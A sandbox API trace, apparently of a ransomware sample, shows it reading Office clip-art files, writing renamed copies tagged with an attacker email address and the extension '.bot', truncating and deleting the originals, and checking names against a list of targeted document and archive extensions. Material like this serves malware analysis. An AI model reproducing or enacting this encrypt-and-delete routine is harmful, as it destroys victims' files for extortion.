	[0155.226] ReadFile (in: hFile=0x384, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x45be, lpOverlapped=0x0) returned 1
	[0155.229] WriteFile (in: hFile=0x3bc, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x45c0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x45c0, lpOverlapped=0x0) returned 1
	[0155.230] ReadFile (in: hFile=0x384, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0155.230] WriteFile (in: hFile=0x3bc, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0155.230] SetEndOfFile (hFile=0x3bc) returned 1
	[0155.230] CloseHandle (hObject=0x3bc) returned 1
	[0155.230] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.230] SetEndOfFile (hFile=0x384) returned 1
	[0155.234] CloseHandle (hObject=0x384) returned 1
	[0155.234] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099204.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0155.235] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099204.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099204.wmf")) returned 1
	[0155.236] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099204.WMF") returned 63
	[0155.236] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099204.WMF") returned 63
	[0155.236] lstrlenW (lpString=".doc") returned 4
	[0155.236] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0155.236] lstrlenW (lpString=".docx") returned 5
	[0155.236] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0155.236] lstrlenW (lpString=".pdf") returned 4
	[0155.236] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0155.236] lstrlenW (lpString=".xls") returned 4
	[0155.236] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0155.236] lstrlenW (lpString=".xlsx") returned 5
	[0155.236] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0155.236] lstrlenW (lpString=".ppt") returned 4
	[0155.236] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0155.236] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099204.WMF") returned 63
	[0155.236] lstrlenW (lpString=".zip") returned 4
	[0155.236] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0155.236] lstrlenW (lpString=".rar") returned 4
	[0155.236] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0155.236] lstrlenW (lpString=".bz2") returned 4
	[0155.236] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0155.236] lstrlenW (lpString=".7z") returned 3
	[0155.236] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0155.236] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099204.WMF") returned 63
	[0155.236] lstrlenW (lpString=".dbf") returned 4
	[0155.236] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0155.236] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099204.WMF") returned 63
	[0155.237] lstrlenW (lpString=".1cd") returned 4
	[0155.237] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0155.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099204.WMF") returned 63
	[0155.237] lstrlenW (lpString=".jpg") returned 4
	[0155.237] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0155.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099204.WMF") returned 63
	[0155.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099204.WMF") returned 63
	[0155.237] lstrlenW (lpString=".doc") returned 4
	[0155.237] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0155.237] lstrlenW (lpString=".docx") returned 5
	[0155.237] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0155.237] lstrlenW (lpString=".pdf") returned 4
	[0155.237] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0155.237] lstrlenW (lpString=".xls") returned 4
	[0155.237] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0155.237] lstrlenW (lpString=".xlsx") returned 5
	[0155.237] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0155.237] lstrlenW (lpString=".ppt") returned 4
	[0155.237] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0155.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099204.WMF") returned 63
	[0155.237] lstrlenW (lpString=".zip") returned 4
	[0155.237] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0155.237] lstrlenW (lpString=".rar") returned 4
	[0155.237] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0155.237] lstrlenW (lpString=".bz2") returned 4
	[0155.237] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0155.237] lstrlenW (lpString=".7z") returned 3
	[0155.237] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0155.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099204.WMF") returned 63
	[0155.237] lstrlenW (lpString=".dbf") returned 4
	[0155.237] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0155.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099204.WMF") returned 63
	[0155.238] lstrlenW (lpString=".1cd") returned 4
	[0155.238] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0155.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099204.WMF") returned 63
	[0155.238] lstrlenW (lpString=".jpg") returned 4
	[0155.238] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0155.238] lstrcmpiW (lpString1=".BMP", lpString2=".bot") returned -1
	[0155.238] lstrlenW (lpString="J0101864.BMP") returned 12
	[0155.238] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101864.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101864.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0155.238] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=31968) returned 1
	[0155.239] CloseHandle (hObject=0x384) returned 1
	[0155.239] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101864.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101864.bmp")) returned 0x20
	[0155.239] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101864.BMP.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101864.bmp.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0155.239] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101864.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101864.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0155.239] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.239] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.239] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101864.BMP.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101864.bmp.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0155.240] GetLastError () returned 0x0
	[0155.240] ReadFile (in: hFile=0x384, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x7ce0, lpOverlapped=0x0) returned 1
	[0155.242] WriteFile (in: hFile=0x3bc, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x7cf0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x7cf0, lpOverlapped=0x0) returned 1
	[0155.243] ReadFile (in: hFile=0x384, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0155.243] WriteFile (in: hFile=0x3bc, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0155.244] SetEndOfFile (hFile=0x3bc) returned 1
	[0155.244] CloseHandle (hObject=0x3bc) returned 1
	[0155.244] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.244] SetEndOfFile (hFile=0x384) returned 1
	[0155.246] CloseHandle (hObject=0x384) returned 1
	[0155.246] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101864.BMP.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0155.246] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101864.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101864.bmp")) returned 1
	[0155.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101864.BMP") returned 63
	[0155.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101864.BMP") returned 63
	[0155.247] lstrlenW (lpString=".doc") returned 4
	[0155.247] lstrcmpiW (lpString1=".doc", lpString2=".BMP") returned 1
	[0155.247] lstrlenW (lpString=".docx") returned 5
	[0155.247] lstrcmpiW (lpString1=".docx", lpString2="4.BMP") returned -1
	[0155.247] lstrlenW (lpString=".pdf") returned 4
	[0155.247] lstrcmpiW (lpString1=".pdf", lpString2=".BMP") returned 1
	[0155.247] lstrlenW (lpString=".xls") returned 4
	[0155.247] lstrcmpiW (lpString1=".xls", lpString2=".BMP") returned 1
	[0155.247] lstrlenW (lpString=".xlsx") returned 5
	[0155.247] lstrcmpiW (lpString1=".xlsx", lpString2="4.BMP") returned -1
	[0155.247] lstrlenW (lpString=".ppt") returned 4
	[0155.247] lstrcmpiW (lpString1=".ppt", lpString2=".BMP") returned 1
	[0155.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101864.BMP") returned 63
	[0155.247] lstrlenW (lpString=".zip") returned 4
	[0155.248] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1
	[0155.248] lstrlenW (lpString=".rar") returned 4
	[0155.248] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1
	[0155.248] lstrlenW (lpString=".bz2") returned 4
	[0155.248] lstrcmpiW (lpString1=".bz2", lpString2=".BMP") returned 1
	[0155.248] lstrlenW (lpString=".7z") returned 3
	[0155.248] lstrcmpiW (lpString1=".7z", lpString2="BMP") returned -1
	[0155.248] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101864.BMP") returned 63
	[0155.248] lstrlenW (lpString=".dbf") returned 4
	[0155.248] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1
	[0155.248] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101864.BMP") returned 63
	[0155.248] lstrlenW (lpString=".1cd") returned 4
	[0155.248] lstrcmpiW (lpString1=".1cd", lpString2=".BMP") returned -1
	[0155.248] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101864.BMP") returned 63
	[0155.248] lstrlenW (lpString=".jpg") returned 4
	[0155.248] lstrcmpiW (lpString1=".jpg", lpString2=".BMP") returned 1
	[0155.248] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101864.BMP") returned 63
	[0155.248] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101864.BMP") returned 63
	[0155.248] lstrlenW (lpString=".doc") returned 4
	[0155.248] lstrcmpiW (lpString1=".doc", lpString2=".BMP") returned 1
	[0155.248] lstrlenW (lpString=".docx") returned 5
	[0155.248] lstrcmpiW (lpString1=".docx", lpString2="4.BMP") returned -1
	[0155.248] lstrlenW (lpString=".pdf") returned 4
	[0155.248] lstrcmpiW (lpString1=".pdf", lpString2=".BMP") returned 1
	[0155.248] lstrlenW (lpString=".xls") returned 4
	[0155.248] lstrcmpiW (lpString1=".xls", lpString2=".BMP") returned 1
	[0155.248] lstrlenW (lpString=".xlsx") returned 5
	[0155.248] lstrcmpiW (lpString1=".xlsx", lpString2="4.BMP") returned -1
	[0155.248] lstrlenW (lpString=".ppt") returned 4
	[0155.248] lstrcmpiW (lpString1=".ppt", lpString2=".BMP") returned 1
	[0155.249] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101864.BMP") returned 63
	[0155.249] lstrlenW (lpString=".zip") returned 4
	[0155.249] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1
	[0155.249] lstrlenW (lpString=".rar") returned 4
	[0155.249] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1
	[0155.249] lstrlenW (lpString=".bz2") returned 4
	[0155.249] lstrcmpiW (lpString1=".bz2", lpString2=".BMP") returned 1
	[0155.249] lstrlenW (lpString=".7z") returned 3
	[0155.249] lstrcmpiW (lpString1=".7z", lpString2="BMP") returned -1
	[0155.249] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101864.BMP") returned 63
	[0155.249] lstrlenW (lpString=".dbf") returned 4
	[0155.249] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1
	[0155.249] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101864.BMP") returned 63
	[0155.249] lstrlenW (lpString=".1cd") returned 4
	[0155.249] lstrcmpiW (lpString1=".1cd", lpString2=".BMP") returned -1
	[0155.249] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101864.BMP") returned 63
	[0155.249] lstrlenW (lpString=".jpg") returned 4
	[0155.249] lstrcmpiW (lpString1=".jpg", lpString2=".BMP") returned 1
	[0155.249] lstrcmpiW (lpString1=".BMP", lpString2=".bot") returned -1
	[0155.249] lstrlenW (lpString="J0101865.BMP") returned 12
	[0155.249] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101865.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101865.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0155.250] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=32184) returned 1
	[0155.250] CloseHandle (hObject=0x384) returned 1
	[0155.250] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101865.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101865.bmp")) returned 0x20
	[0155.250] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101865.BMP.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101865.bmp.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0155.250] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101865.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101865.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0155.250] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.250] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.250] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101865.BMP.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101865.bmp.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0155.251] GetLastError () returned 0x0
	[0155.251] ReadFile (in: hFile=0x384, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x7db8, lpOverlapped=0x0) returned 1
	[0155.253] WriteFile (in: hFile=0x3bc, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x7dc0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x7dc0, lpOverlapped=0x0) returned 1
	[0155.254] ReadFile (in: hFile=0x384, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0155.254] WriteFile (in: hFile=0x3bc, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0155.254] SetEndOfFile (hFile=0x3bc) returned 1
	[0155.254] CloseHandle (hObject=0x3bc) returned 1
	[0155.254] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.254] SetEndOfFile (hFile=0x384) returned 1
	[0155.258] CloseHandle (hObject=0x384) returned 1
	[0155.258] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101865.BMP.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0155.258] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101865.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101865.bmp")) returned 1
	[0155.259] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101865.BMP") returned 63
	[0155.259] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101865.BMP") returned 63
	[0155.259] lstrlenW (lpString=".doc") returned 4
	[0155.259] lstrcmpiW (lpString1=".doc", lpString2=".BMP") returned 1
	[0155.259] lstrlenW (lpString=".docx") returned 5
	[0155.259] lstrcmpiW (lpString1=".docx", lpString2="5.BMP") returned -1
	[0155.259] lstrlenW (lpString=".pdf") returned 4
	[0155.259] lstrcmpiW (lpString1=".pdf", lpString2=".BMP") returned 1
	[0155.259] lstrlenW (lpString=".xls") returned 4
	[0155.259] lstrcmpiW (lpString1=".xls", lpString2=".BMP") returned 1
	[0155.259] lstrlenW (lpString=".xlsx") returned 5
	[0155.259] lstrcmpiW (lpString1=".xlsx", lpString2="5.BMP") returned -1
	[0155.259] lstrlenW (lpString=".ppt") returned 4
	[0155.259] lstrcmpiW (lpString1=".ppt", lpString2=".BMP") returned 1
	[0155.259] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101865.BMP") returned 63
	[0155.259] lstrlenW (lpString=".zip") returned 4
	[0155.259] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1
	[0155.259] lstrlenW (lpString=".rar") returned 4
	[0155.259] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1
	[0155.259] lstrlenW (lpString=".bz2") returned 4
	[0155.259] lstrcmpiW (lpString1=".bz2", lpString2=".BMP") returned 1
	[0155.260] lstrlenW (lpString=".7z") returned 3
	[0155.260] lstrcmpiW (lpString1=".7z", lpString2="BMP") returned -1
	[0155.260] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101865.BMP") returned 63
	[0155.260] lstrlenW (lpString=".dbf") returned 4
	[0155.260] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1
	[0155.260] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101865.BMP") returned 63
	[0155.260] lstrlenW (lpString=".1cd") returned 4
	[0155.260] lstrcmpiW (lpString1=".1cd", lpString2=".BMP") returned -1
	[0155.260] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101865.BMP") returned 63
	[0155.260] lstrlenW (lpString=".jpg") returned 4
	[0155.260] lstrcmpiW (lpString1=".jpg", lpString2=".BMP") returned 1
	[0155.260] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101865.BMP") returned 63
	[0155.260] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101865.BMP") returned 63
	[0155.260] lstrlenW (lpString=".doc") returned 4
	[0155.260] lstrcmpiW (lpString1=".doc", lpString2=".BMP") returned 1
	[0155.260] lstrlenW (lpString=".docx") returned 5
	[0155.260] lstrcmpiW (lpString1=".docx", lpString2="5.BMP") returned -1
	[0155.260] lstrlenW (lpString=".pdf") returned 4
	[0155.260] lstrcmpiW (lpString1=".pdf", lpString2=".BMP") returned 1
	[0155.260] lstrlenW (lpString=".xls") returned 4
	[0155.260] lstrcmpiW (lpString1=".xls", lpString2=".BMP") returned 1
	[0155.260] lstrlenW (lpString=".xlsx") returned 5
	[0155.260] lstrcmpiW (lpString1=".xlsx", lpString2="5.BMP") returned -1
	[0155.260] lstrlenW (lpString=".ppt") returned 4
	[0155.260] lstrcmpiW (lpString1=".ppt", lpString2=".BMP") returned 1
	[0155.260] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101865.BMP") returned 63
	[0155.260] lstrlenW (lpString=".zip") returned 4
	[0155.260] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1
	[0155.260] lstrlenW (lpString=".rar") returned 4
	[0155.260] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1
	[0155.261] lstrlenW (lpString=".bz2") returned 4
	[0155.261] lstrcmpiW (lpString1=".bz2", lpString2=".BMP") returned 1
	[0155.261] lstrlenW (lpString=".7z") returned 3
	[0155.261] lstrcmpiW (lpString1=".7z", lpString2="BMP") returned -1
	[0155.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101865.BMP") returned 63
	[0155.261] lstrlenW (lpString=".dbf") returned 4
	[0155.261] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1
	[0155.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101865.BMP") returned 63
	[0155.261] lstrlenW (lpString=".1cd") returned 4
	[0155.261] lstrcmpiW (lpString1=".1cd", lpString2=".BMP") returned -1
	[0155.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101865.BMP") returned 63
	[0155.261] lstrlenW (lpString=".jpg") returned 4
	[0155.261] lstrcmpiW (lpString1=".jpg", lpString2=".BMP") returned 1
	[0155.261] lstrcmpiW (lpString1=".BMP", lpString2=".bot") returned -1
	[0155.261] lstrlenW (lpString="J0101866.BMP") returned 12
	[0155.261] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101866.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101866.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0155.262] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=32184) returned 1
	[0155.262] CloseHandle (hObject=0x384) returned 1
	[0155.262] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101866.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101866.bmp")) returned 0x20
	[0155.262] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101866.BMP.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101866.bmp.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0155.262] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101866.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101866.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0155.262] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.262] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.262] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101866.BMP.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101866.bmp.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0155.263] GetLastError () returned 0x0
	[0155.263] ReadFile (in: hFile=0x384, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x7db8, lpOverlapped=0x0) returned 1
